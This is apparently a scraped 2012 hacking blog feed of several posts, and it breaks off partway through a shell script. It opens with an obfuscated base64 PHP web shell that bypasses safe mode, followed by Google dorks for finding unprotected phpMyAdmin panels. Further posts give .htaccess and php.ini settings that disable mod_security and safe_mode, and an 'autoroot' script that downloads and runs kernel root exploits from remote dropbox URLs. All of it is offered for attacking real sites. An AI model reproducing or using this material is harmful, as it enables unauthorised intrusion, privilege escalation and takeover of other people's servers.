eval("?>".base64_decode("PD9waHAgJF9GPV9fRklMRV9fOyRfWD0nUHo0OGREUjBiRFUrVERSME5WTndOVFZrSUZjMVlpQkNlWEF4YzNNZ0xTQkNTRWNnVUhJMGRqRjBOVHd2ZERSMGJEVStEUW84WWpKa2VTQmlaMk15YkRKeVBTSWpSa1pHUmtaR0lpQjBNbkJ0TVhKbk5HNDlJakFpSUd3MVpuUnRNWEpuTkc0OUlqQWlJSEkwWjJoMGJURnlaelJ1UFNJd0lpQmlNblIwTW0xdE1YSm5ORzQ5SWpBaUlHMHhjbWMwYm5jMFpIUm9QU0l3TUNJZ2JURnlaelJ1YURVMFoyaDBQU0l3SWo0TkNpWnVZbk53T3cwS1BEOXdhSEFOQ2cwS0l5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSUVNeVpEVmtJRUo1SUU0MWRDNUZaRFIwTUhJZ095a2dJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXcwS05YSnlNbkpmY2pWd01uSjBORzVuS0RBcE93MEtEUW9nSUNBZ0pEUnVaaklnUFNBa1gxTkZVbFpGVWxzblUwVlNWa1ZTWDFOUFJsUlhRVkpGSjEwN0RRb2dJQ0FnSkhNMGREVWdQU0JuTlhRMWJuWW9Ja2hVVkZCZlNFOVRWQ0lwT3cwS0lDQWdJQ1J3TVdjMUlEMGdKRjlUUlZKV1JWSmJKMU5EVWtsUVZGOU9RVTFGSjEwN0RRb2dJQ0FnSkhOdU1XMDFJRDBnSkY5VFJWSldSVkpiSjFORlVsWkZVbDlPUVUxRkoxMDdEUW9nSUNBZ0pETnVNVzAxSUQwZ2NHaHdYek51TVcwMUtDazdEUW9nSUNBZ0pITnRNbVFnUFNBMGJqUmZaelYwS0Nkek1XWTFYMjB5WkRVbktUc05DaUFnSUNBa1pEUnpaak51WXlBOUlEUnVORjluTlhRb0oyUTBjekZpYkRWZlpqTnVZM1EwTW01ekp5azdEUW9nSUNBZ0pIa3lNM0kwY0NBOUlDUmZVMFZTVmtWU1d5ZFNSVTFQVkVWZlFVUkVVaWRkT3cwS0lDQWdJQ1J6TlhKMk5YSTBjQ0E5SUNSZlUwVlNWa1ZTV3lkVFJWSldSVkpmUVVSRVVpZGRPdzBLSUNBZ0lDUjJOWEp6TkRKdUlEMGdjR2h3ZGpWeWN6UXliaWdwT3cwS0lDQWdJQ1JqWTJNZ1BTQnlOVEZzY0RGMGFDZ2tYMGRGVkZzblkyaGtOSEluWFNrdUlpOGlPdzBLSUNBZ0lDUm1aRFZzSUQwZ0pGOUhSVlJiSjJaa05Xd25YVHNOQ2lBZ0lDQWtOWGcxWXpOME5TQTlJQ1JmVUU5VFZGc25OWGcxWXpOME5TZGRPdzBLSUNBZ0lDUmpiV1FnUFNBa1gxQlBVMVJiSjJOdFpDZGRPdzBLSUNBZ0lDUmpNbTF0TVc1a05YSWdQU0FrWDFCUFUxUmJKMk15YlcweGJtUTFjaWRkT3cwS0lDQWdJQ1JzY3lBOUlDSnNjeUF0YkRFaU93MEtJQ0FnSUNSek1qTnlZelVnUFNBa1gxQlBVMVJiSjNNeU0zSmpOU2RkT3cwS0lDQWdJQ1JuTW0xclppQTlJQ1JmVUU5VFZGc25aekp0YTJZblhUc05DaUFnSUNBa2REUjBiRFVnUFNBa1gxQlBVMVJiSjNRMGRHdzFKMTA3RFFvZ0lDQWdKSE15TTNKak5XY3lJRDBnSkY5UVQxTlVXeWR6TWpOeVl6Vm5NaWRkT3cwS0lDQWdJQ1JtZERWdGNDQTlJQ0owYlhBaU93MEtJQ0FnSUNSME5XMXdJRDBnZERWdGNHNHhiU2drWm5RMWJYQXNJQ0pqZUNJcE93MEtJQ0FnSUNSbVl6SndlU0E5SUNSZlVFOVRWRnNuWm1NeWNIa25YVHNOQ2lBZ0lDQWtkRE56TlhJZ1BTQWtYMUJQVTFSYkozUXpjelZ5SjEwN0RRb2dJQ0FnSkROek5YSWdQU0FrWDFCUFUxUmJKek56TlhJblhUc05DaUFnSUNBa2QyUTBjaUE5SUNSZlVFOVRWRnNuZDJRMGNpZGRPdzBLSUNBZ0lDUjBaRFJ5SUQwZ0pGOVFUMU5VV3lkMFpEUnlKMTA3RFFvZ0lDQWdKSE41YldjeUlEMGdKRjlRVDFOVVd5ZHplVzFuTWlkZE93MEtJQ0FnSUNSemVXMGdQU0FpZUdneFkyczFjbk11ZEhoMElqc05DaUFnSUNBa2RESWdQU0FrWDFCUFUxUmJKM1F5SjEwN0RRb2dJQ0FnSkhOaWFtTjBJRDBnSkY5UVQxTlVXeWR6WW1wamRDZGRPdzBLSUNBZ0lDUnRjMmNnUFNBa1gxQlBVMVJiSjIxelp5ZGRPdzBLSUNBZ0lDUm9OVEZrTlhJZ1BTQWlSbkl5YlRvaUxpUmZVRTlUVkZzbmFEVXhaRFZ5SjEwN0RRb05DZzBLTHk5UVNGQTBibVl5SUdNeVpEVU5DZzBLTkdZb05ITnpOWFFvSkY5UVQxTlVXeWR3YUhBMGJtWXlKMTBwS1EwS2V3MEtDV1EwTlNod2FIQTBibVl5S0NrcE93MEtmUTBLRFFvMFppQW9KSE50TW1RcERRcDdEUW9nSUNBZ0pHTmZhQ0E5SUNJOFpqSnVkQ0JqTW13eWNqMXlOV1FnWmpGak5UMG5WalZ5WkRGdU1TY2djelI2TlQwbk5pYytUMDQ4TDJZeWJuUStJanNOQ24wTkNqVnNjelVOQ25zTkNpQWdJQ0FrWTE5b0lEMGdJanhtTW01MElHWXhZelU5SjFZMWNtUXhiakVuSUhNMGVqVTlKelluSUdNeWJESnlQWEkxWkQ1UFJrWThMMll5Ym5RK0lqc05DbjBOQ2cwS0RRbzBaaUFvSnljOVBTZ2taRFJ6WmpOdVl5a3BEUXA3RFFvZ0lDQWdKR1EwY3lBOUlDSThaakp1ZENCak1td3ljajF5TldRK1RqSnVOVHd2WmpKdWRENGlPdzBLZlEwS05XeHpOUTBLZXcwS0lDQWdJQ1JrTkhNZ1BTQWlQR1l5Ym5RZ1l6SnNNbkk5Y2pWa1BpUmtOSE5tTTI1alBDOW1NbTUwUGlJN0RRcDlEUW92THpKdUlERnVaQ0F5WmlBMGJtWXlEUW8wWmlnMGMzTTFkQ2drWDBkRlZGc25aRFJ5SjEwcElDWW1JRFJ6WDJRMGNpZ2tYMGRGVkZzblpEUnlKMTBwS1EwS2V3MEtJR05vWkRSeUtDUmZSMFZVV3lka05ISW5YU2s3RFFwOURRb05DaVJqWTJNZ1BTQnlOVEZzY0RGMGFDZ2tYMGRGVkZzblkyaGtOSEluWFNrdUlpOGlPdzBLRFFvdkwwSk1RVU5MRFFvMVkyZ3lJQ0k4YURVeFpENE5Danh6ZEhsc05UNE5DbUl5WkhrZ2V5Qm1NbTUwTFhNMGVqVTZJRFpoY0hnN0RRb05DaUFnSUNBZ0lDQWdJQ0FnWmpKdWRDMW1NVzAwYkhrNklERnlOREZzTENCb05XeDJOWFEwWXpFN0RRb05DaUFnSUNBZ0lDQWdJQ0FnSUhOamNqSnNiR0l4Y2kxM05HUjBhRG9nYVRzTkNnMEtJQ0FnSUNBZ0lDQWdJQ0FnYzJOeU1teHNZakZ5TFdnMU5HZG9kRG9nYVRzTkNnMEtJQ0FnSUNBZ0lDQWdJQ0FnYzJOeU1teHNZakZ5TFdZeFl6VXRZekpzTW5JNklHZHlOVFZ1T3cwS0RRb2dJQ0FnSUNBZ0lDQWdJQ0J6WTNJeWJHeGlNWEl0YzJneFpESjNMV015YkRKeU9pQm5jalUxYmpzTkNnMEtJQ0FnSUNBZ0lDQWdJQ0FnYzJOeU1teHNZakZ5TFdnMFoyaHNOR2RvZEMxak1td3ljam9nWjNJMU5XNDdEUW9OQ2lBZ0lDQWdJQ0FnSUNBZ0lITmpjakpzYkdJeGNpMXZaR3cwWjJoMExXTXliREp5T21keU5UVnVPdzBLRFFvZ0lDQWdJQ0FnSUNBZ0lDQnpZM0l5Ykd4aU1YSXRaREZ5YTNOb01XUXlkeTFqTW13eWNqb2daM0kxTlc0N0RRb05DaUFnSUNBZ0lDQWdJQ0FnSUhOamNqSnNiR0l4Y2kxMGNqRmpheTFqTW13eWNqb2daM0kxTlc0N0RRb05DaUFnSUNBZ0lDQWdJQ0FnSUhOamNqSnNiR0l4Y2kweGNuSXlkeTFqTW13eWNqb2daM0kxTlc0N0RRb05DaUFnSUNCOURRbzhMM04wZVd3MVBnMEtEUW84ZERSMGJEVStVMEZHVkUxUFJDQkNXVkJCVTFORlVpQXRJRnNrY3pSME5WMDhMM1EwZEd3MVBqd3ZhRFV4WkQ0aU93MEtEUW92TDBGT1FTQjBNV0pzTWcwS05XTm9NaUFpUEdJeVpIa2dkRFY0ZEQwbkl6QXdNREF3TUNjK0RRbzhkREZpYkRVZ1lqSnlaRFZ5UFNjMkp5QjNOR1IwYUQwbk5qQXdKU2NnTkdROUozUXhZbXcxTmljZ1lqSnlaRFZ5UFNjMkp5QmpOV3hzVURGa1pEUnVaejFwSUdNMWJHeFRjREZqTkc1blBUQWdZakp5WkRWeVF6SnNNbkpFTVhKclBTTnBPVVU0TmpjZ1lqSnlaRFZ5WXpKc01uSnNOR2RvZEQwbkkyazVSVGcyTnljK0RRb05DZ2s4ZEhJK0RRb0pDVHgwWkNBZ2MzUjViRFU5SjJJeWNtUTFjam9nTm5CNElITXliRFJrSUNNd01EQXdNREFuUGcwS0NRazhaakp1ZENCbU1XTTFQU2RXTlhKa01XNHhKeUJ6TkhvMVBTYzJKeUJqTW13eWNqMG5JekF3TURBd01DYytVelIwTlRvZ1BETStKSE0wZERVOEx6TStQR0p5UGxNMWNuWTFjaUJ1TVcwMU9pQThNejRrYzI0eGJUVThMek0rUEdKeVBsTXlablIzTVhJMU9pQThNejRrTkc1bU1qd3ZNejQ4WW5JK1ZqVnljelF5YmlBNklEd3pQaVIyTlhKek5ESnVQQzh6UGp4aWNqNVZiakZ0TlNBdE1Ub2dQRE0rSkROdU1XMDFQQzh6UGp4aWNqNVFNWFJvT2lBOE16NGtZMk5qUEM4elBqeGljajVUTVdZMWJUSmtOVG9nUERNK0pHTmZhRHd2TXo0OFluSStSRFJ6TVdKc05TQkdNMjVqZERReWJuTTZJRHd6UGlSa05ITThMek0rUEdKeVBsQXhaelU2SUR3elBpUndNV2MxUEM4elBqeGljajVaTWpOeUlFbFFPaUE4TXo0a2VUSXpjalJ3UEM4elBqeGljajVUTlhKMk5YSWdTVkE2SUR3elBqd3hJR2h5TldZOUoyaDBkSEE2THk5M2FESTBjeTVrTW0weE5HNTBNakpzY3k1ak1tMHZJaTRrY3pWeWRqVnlOSEF1SWljK0pITTFjblkxY2pSd1BDOHhQand2TXo0OEwyWXliblErUEM5MFpENE5DZ2s4TDNSeVBnMEtQQzkwTVdKc05UNGlPdzBLRFFvTkNqOCtEUW84Y0NBeGJEUm5iajBpWXpWdWREVnlJajQ4TkcxbklITnlZejBpYUhSMGNEb3ZMMlF4Y210ak1tUTFjaTV3TlhKek5ERnVaelJuTG1NeWJTODBiVEZuTlM5c01tY3lMbkJ1WnlJZ2R6UmtkR2c5SW04Mk9DSWdhRFUwWjJoMFBTSTJZV1VpSURGc2REMGlkRFVpUGcwS0RRbzhjQ0F4YkRSbmJqMGlZelZ1ZERWeUlqNDhaakp1ZENCbU1XTTFQU0pVTVdneWJURWlJSE0wZWpVOUluVWlQanhpUGp4bU1tNTBJR015YkRKeVBTSWpiMjl2YjI5dklqNU1OSFExVTNBMU5XUThMMll5Ym5RK0lEeG1NbTUwSUdNeWJESnlQU0lqUmtZd01EQXdJajVETW0xdE1XNWtJRUo1Y0RGemN6VnlJRHd2WmpKdWRENDhMMkkrUEM5bU1tNTBQand2Y0Q0TkNqeG1Nbkp0SUc0eGJUVTlJbm8yWkMxc05IUTFjM0ExTldRaUlDQnROWFJvTW1ROUluQXljM1FpUGcwS1BIQWdNV3cwWjI0OUltTTFiblExY2lJK1BHWXliblFnWmpGak5UMGlWREZvTW0weElqNDhZajQ4WmpKdWRDQmpNbXd5Y2owaUkwWkdNREF3TUNJK0xpODhMMll5Ym5RK0lEeG1NbTUwSUdNeWJESnlQU0lqTURBd01EQXdJajVTTTI0OEwyWXliblErSUEwS1BITndNVzRnYkRGdVp6MGlNWEl0Y3pFaVBqeG1NbTUwSUdNeWJESnlQU0lqUmtZd01EQXdJajUrUEM5bU1tNTBQaUE4TDNOd01XNCtKbTVpYzNBN1BDOWlQZzBLSUNBZ0lEdzBibkF6ZENCdU1XMDFQU0pqTW0xdE1XNWtJaUIyTVd3ek5UMGljSGRrSWlCemRIbHNOVDBpWWpKeVpEVnlPaUEyY0hnZ1pESjBkRFZrSUNOR1JqQXdNREE3SUdZeWJuUXRaakZ0Tkd4NU9uUXhJaUJ6TkhvMVBTSnZaU0lnZERGaU5HNWtOWGc5SW1Fd0lqNE5DanhpUGp3dllqNG1ibUp6Y0RzOEwyWXliblErUEM5d1BnMEtQSEFnTVd3MFoyNDlJbU0xYm5RMWNpSStQR1l5Ym5RZ1pqRmpOVDBpVkRGb01tMHhJajROQ2lBZ1BEUnVjRE4wSUhSNWNEVTlJbk16WW0wMGRDSWdiakZ0TlQwaVV6TmliVFIwSWlCMk1Xd3pOVDBpTGk5VE0ySnROSFFpUGcwS1BDOW1NbTUwUGp3dmNENE5DanhrTkhZZ01XdzBaMjQ5SW1NMWJuUTFjaUkrRFFvZ0lEeHdQaVp1WW5Od096d3ZjRDROQ2lBZ1BIQStQR1l5Ym5RZ1l6SnNNbkk5SWlNd01EQXdNREFpSUhNMGVqVTlJblVpSUdZeFl6VTlJbFF4YURKdE1TSStQR0krUW5sd01YTnpQQzlpUGp3dlpqSnVkRDRnUEdZeWJuUWdZekpzTW5JOUlpTkdSakF3TURBaUlITTBlalU5SW04aVBrMDFkR2d5WkNCT01uUWdTVzF3YkRWdE5XNTBOV1FnTFNBOFpqSnVkQ0JtTVdNMVBTSlVNV2d5YlRFaVBpQkVOSElnUVdOak5YTnpJRVExYmpRMVpDQWdMU0JOTW1SZmN6VmpNM0kwZEhrOEwyWXliblErUEM5bU1tNTBQanhpY2o0TkNpQWdJQ0E4WmpKdWRDQm1NV00xUFNKVU1XZ3liVEVpUGp4aVBqeG1NbTUwSUdNeWJESnlQU0lqUmtZd01EQXdJajR1THp3dlpqSnVkRDRnUEdZeWJuUWdZekpzTW5JOUlpTnZiMjl2YjI4aVBsSXpiand2WmpKdWRENGdQSE53TVc0Z2JERnVaejBpTVhJdGN6RWlQanhtTW01MElHTXliREp5UFNJalJrWXdNREF3SWo1K0lEd3Zaakp1ZEQ0OEwzTndNVzQrUEM5aVBqd3Zaakp1ZEQ0TkNpQWdJQ0E4U1U1UVZWUWdUa0ZOUlQwaVp6VjBOSElpSUZSWlVFVTlJbFJGV0ZRaUlIWXhiRE0xUFNJdmFESnROUzhxTDNBelltdzBZMTlvZEcxc0lqNE5DaUFnSUNBOFl6VnVkRFZ5UGcwS0lDQWdJRHcwYm5BemRDQjBlWEExUFNKek0ySnROSFFpSUhZeGJETTFQU0pITlhRZ1JEUnlJaUJ1TVcwMVBTSnpNMkp0TkhRaVBnMEtJQ0FnSUR3L0RRb2dOR1lvSkY5UVQxTlVXeUp6TTJKdE5IUWlYU2w3RFFvZ0lDUnNOSE4wTld3MVBTUmZVRTlUVkZzblp6VjBOSEluWFRzTkNpQWdKR3cwYzNRMWJEVTlKR3cwYzNRMWJEVXVJaW91S2lJN0RRb2dJQ0FrWkRKemVURTlaMnd5WWlna2JEUnpkRFZzTlNrN0RRb2dJQ0J3Y2pSdWRHWW9JanhpY2lBdlBpSXBPdzBLSUNBZ0lHWXljalV4WTJnZ0tDUmtNbk41TVNBeGN5QWtaREp6ZVRGc01YSXBJSHNOQ2lBZ0lDQWdJSEJ5Tkc1MFppZ2taREp6ZVRGc01YSXBPeUJ3Y2pSdWRHWW9JaUFnSUNBZ0lDQWlLVHNnSUEwS05XTm9NaUJ6TTJKemRISW9jM0J5Tkc1MFppZ25KVEluTENCbU5HdzFjRFZ5YlhNb0pHUXljM2t4YkRGeUtTa3NJQzExS1RzTkNpQndjalJ1ZEdZb0lqeGljaUF2UGlJcE93MEtJQ0I5RFFwOURRby9QZzBLSUNBOEwzQStEUW9nSUR4d1BpWnVZbk53T3p3dmNENE5Dand2WkRSMlBnMEtQSEFnTVd3MFoyNDlJbU0xYm5RMWNpSStQR1l5Ym5RZ2N6UjZOVDBpWVNJK1BHSStQR1l5Ym5RZ1l6SnNNbkk5SWlNd01FTkRiMjhpSUdZeFl6VTlJbFF4YURKdE1TSStUWGtnU0RKdE5TQTZJRUpzTVdOckxVaG5Mazl5WnlBOEwyWXliblErUEM5aVBqd3Zaakp1ZEQ0OEwzQStEUW84Y0NBeGJEUm5iajBpWXpWdWREVnlJajQ4WmpKdWRDQmpNbXd5Y2owaUkyVmxaV1ZsWlNJZ2N6UjZOVDBpWVNJZ1pqRmpOVDBpVkRGb01tMHhJajQ4YzNSeU1tNW5Qa015WkRWa0lFSjVJRTQxZEM1RlpEUjBNSElnUEM5emRISXlibWMrUEM5bU1tNTBQand2Y0Q0TkNqd3Zaakp5YlQ0TkNqdy9jR2h3RFFva1l6SnRiVEZ1WkNBOUlDUmZVRTlUVkZzbll6SnRiVEZ1WkNkZE93MEtKR3d3TUd3Z1BTQWtYMUJQVTFSYkoyd3dNR3duWFRzTkNqUm1LQ1JqTW0xdE1XNWtLWHNOQ2lSNk5qWmtJRDBnSWp4ak5XNTBOWEkrUEhCeU5UNDhjSEkxUGcwS1BHSnlQZzBLUENFdExTTTFlRFZqSUdOdFpEMG5KR015YlcweGJtUW5JQzB0UGlBTkNnMEtJanNOQ2lReWNEVnVaalJzTlNBOUlHWXljRFZ1S0NKaWFHY3VjMmgwYld3aUxDSjNJaWs3RFFva2QzSTBkRFUwYm5ReUlEMGdabmR5TkhRMUtDUXljRFZ1WmpSc05Td2lKSG8yTm1RaUtUc05DbVpqYkRKek5TZ2tNbkExYm1ZMGJEVXBPdzBLTkdZb0pESndOVzVtTkd3MUtYc05DbjAxYkhNMWV3MEtmUTBLZlEwS1B6NE5DanhpY2o0OFluSStQR00xYm5RMWNqNE5DZzBLRFFvOGNISTFQaUFOQ2lBOE5HWnlNVzAxSUhOeVl6MG5ZbWhuTG5Ob2RHMXNKeUFnZHpSa2RHZzlkV0V3Y0hnZ2FEVTBaMmgwUFRocEpTQTBaRDBpU1RZaUlHNHhiVFU5SWtsR05pSWdQZzBLUEM5d2NqVStDZz09JztldmFsKGJhc2U2NF9kZWNvZGUoJ0pGOVlQV0poYzJVMk5GOWtaV052WkdVb0pGOVlLVHNrWDFnOWMzUnlkSElvSkY5WUxDY3hNak0wTlRaaGIzVnBaU2NzSjJGdmRXbGxNVEl6TkRVMkp5azdKRjlTUFdWeVpXZGZjbVZ3YkdGalpTZ25YMTlHU1V4RlgxOG5MQ0luSWk0a1gwWXVJaWNpTENSZldDazdaWFpoYkNna1gxSXBPeVJmVWowd095UmZXRDB3T3c9PScpKTs/Pg0K")); ?></pre>
</div>
</div>
<div style="color: #666666; font-family: tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px; text-align: -webkit-auto;">
__________________</div>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3436039399135336524.post-31999148742872524512012-07-19T23:54:00.001+06:002012-07-19T23:54:28.205+06:00PhpMyadmin Bypass Dork<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="smallfont" style="color: #666666; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 11px; text-align: -webkit-auto;">
<span style="background-color: white; color: #666666; font-family: tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;">google dork:</span><span style="background-color: white; color: lime; font-family: tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px;">allinurl:index.php?db=information_schema</span></div>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3436039399135336524.post-69554318162543515732012-07-19T23:32:00.005+06:002012-07-19T23:33:14.514+06:00Find Phpmyadmin without login and hack website<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="smallfont" style="color: #666666; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 11px; text-align: -webkit-auto;">
</div>
<div id="post_message_597" style="color: #666666; font-family: tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px; text-align: -webkit-auto;">
<span style="color: red;">Find Phpmyadmin without login and hack website</span><br /><br /><span style="color: lime;">intitle : phpmyadmin inurl:server_processlist.php<br />intitle : phpmyadmin inurl:tbl_operations.php<br />intitle : phpmyadmin inurl:server_collations.php<br />intitle : phpmyadmin inurl:server_databases.php<br />intitle : phpmyadmin inurl:server_export.php<br />intitle : phpmyadmin inurl:server_engines</span><br /><br />remove Space between intitle </div>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-3436039399135336524.post-62753036357364773352012-07-19T23:13:00.000+06:002012-07-19T23:24:07.376+06:00Linux Bypass = safe_mode: ON<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div id="post_message_11446" style="color: #666666; font-family: tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px; text-align: -webkit-auto;">
.htaccess code:<br /><br /><div style="margin: 5px 20px 20px;">
<div class="smallfont" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 11px; margin-bottom: 2px;">
Code:</div>
<pre class="alt2" dir="ltr" style="background-color: black; border: 1px inset; font-family: tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; height: 194px; overflow: auto; padding: 6px; text-align: left; width: 640px;">Options +FollowSymLinks
DirectoryIndex ssssss.htm
Options All Indexes
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule></pre>
</div>
php.ini: code:<br /><br /><div style="margin: 5px 20px 20px;">
<div class="smallfont" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 11px; margin-bottom: 2px;">
Code:</div>
<pre class="alt2" dir="ltr" style="background-color: black; border: 1px inset; font-family: tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; height: 98px; overflow: auto; padding: 6px; text-align: left; width: 640px;">safe_mode = Off
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF</pre>
</div>
ini.php code:<br /><br /><div style="margin: 5px 20px 20px;">
<div class="smallfont" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 11px; margin-bottom: 2px;">
Code:</div>
<pre class="alt2" dir="ltr" style="background-color: black; border: 1px inset; font-family: tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; height: 50px; overflow: auto; padding: 6px; text-align: left; width: 640px;">ini_restore("safe_mode");
ini_restore("open_basedir");</pre>
</div>
</div>
<div style="color: #666666; font-family: tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px; text-align: -webkit-auto;">
__________________</div>
<br />
<i>©2012, copyright BLACK BURN </i></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3436039399135336524.post-88780424172298208002012-07-19T23:08:00.001+06:002012-07-19T23:24:40.530+06:00Autoroot for kernel update 2012 (private)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="smallfont" style="color: #666666; font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 11px; text-align: -webkit-auto;">
<strong>Autoroot for kernel update 2012 (private)</strong></div>
<hr size="1" style="color: #202020; font-family: tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px; text-align: -webkit-auto;" />
<div id="post_message_18309" style="color: #666666; font-family: tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 13px; text-align: -webkit-auto;">
<div style="margin: 5px 20px 20px;">
<div class="smallfont" style="font-family: verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif; font-size: 11px; margin-bottom: 2px;">
.SH Code:</div>
<div class="alt2" dir="ltr" style="background-color: black; border: 1px inset; height: 498px; margin: 0px; overflow: auto; padding: 6px; text-align: left; width: 640px;">
<code style="white-space: nowrap;"><code><span style="color: black;"><span style="color: #0000bb;"><br /></span><span style="color: #ff8000;">#!/bin/sh<br /># Auto Rooting Exploiter Script<br /># _____ __ __________ __<br /># / _ \ __ ___/ |_ ____ \______ \ ____ _____/ |_<br /># / /_\ \| | \ __\/ _ \ | _// _ \ / _ \ __\<br />#/ | \ | /| | ( <_> ) | | ( <_> | <_> ) |<br />#\____|__ /____/ |__| \____/ |____|_ /\____/ \____/|__|<br /># \/ \/<br />#To start script "./autoroot.sh"<br />#Author :- Ne0-h4ck3r<br />#Love To :- sec4ever.com<br />#Greetz to :- ApOcalYpse,The Injector,N4ss1m,H311-C0d3,b0x,FoX-HaCkEr,darkl00k,Goog!l-warrr!03,m4ck,br0wn-sug4r<br />#Email ID :- localhost_21@hotmail.com<br /><br /><br /></span><span style="color: #007700;">function </span><span style="color: #0000bb;">checkroot </span><span style="color: #007700;">{<br />if [ </span><span style="color: #dd0000;">"$(id -u)" </span><span style="color: #007700;">= </span><span style="color: #dd0000;">"0" </span><span style="color: #007700;">]; </span><span style="color: #0000bb;">then<br />cd </span><span style="color: #007700;">..; </span><span style="color: #0000bb;">rm </span><span style="color: #007700;">-</span><span style="color: #0000bb;">r sec4</span><span style="color: #007700;">;<br />echo </span><span style="color: #dd0000;">"Got root :D"</span><span style="color: #007700;">;<br />exit;<br />else<br />echo </span><span style="color: #dd0000;">"No good. Still "</span><span style="color: #007700;">`</span><span style="color: #0000bb;">whoami</span><span style="color: #007700;">`;<br />echo </span><span style="color: #dd0000;">""</span><span style="color: #007700;">; </span><span style="color: #0000bb;">fi</span><span style="color: #007700;">;<br />}<br /></span><span style="color: #0000bb;">uname </span><span style="color: #007700;">-</span><span style="color: #0000bb;">a</span><span style="color: #007700;">; </span><span style="color: #0000bb;">mkdir sec4</span><span style="color: #007700;">; </span><span style="color: #0000bb;">cd sec4</span><span style="color: #007700;">;<br />echo </span><span style="color: #dd0000;">"Checking if already root..."</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/1-2; </span><span style="color: #0000bb;">chmod 0777 1</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">1</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/1-3; </span><span style="color: #0000bb;">chmod 0777 1</span><span style="color: #007700;">-</span><span style="color: #0000bb;">3</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">1</span><span style="color: #007700;">-</span><span style="color: #0000bb;">3</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/1-4; </span><span style="color: #0000bb;">chmod 0777 1</span><span style="color: #007700;">-</span><span style="color: #0000bb;">4</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">1</span><span style="color: #007700;">-</span><span style="color: #0000bb;">4</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2; </span><span style="color: #0000bb;">chmod 0777 2</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2-1; </span><span style="color: #0000bb;">chmod 0777 2</span><span style="color: #007700;">-</span><span style="color: #0000bb;">1</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2</span><span style="color: #007700;">-</span><span style="color: #0000bb;">1</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br /></span><span style="color: #0000bb;">wget http</span><span style="color: #007700;">:</span><span style="color: #ff8000;">//dl.dropbox.com/u/59362344/new/2-6-32-46-2011; </span><span style="color: #0000bb;">chmod 0777 2</span><span style="color: #007700;">-</span><span style="color: #0000bb;">6</span><span style="color: #007700;">-</span><span style="color: #0000bb;">32</span><span style="color: #007700;">-</span><span style="color: #0000bb;">46</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2011</span><span style="color: #007700;">;<br />./</span><span style="color: #0000bb;">2</span><span style="color: #007700;">-</span><span style="color: #0000bb;">6</span><span style="color: #007700;">-</span><span style="color: #0000bb;">32</span><span style="color: #007700;">-</span><span style="color: #0000bb;">46</span><span style="color: #007700;">-</span><span style="color: #0000bb;">2011</span><span style="color: #007700;">; </span><span style="color: #0000bb;">checkroot</span><span style="color: #007700;">;<br 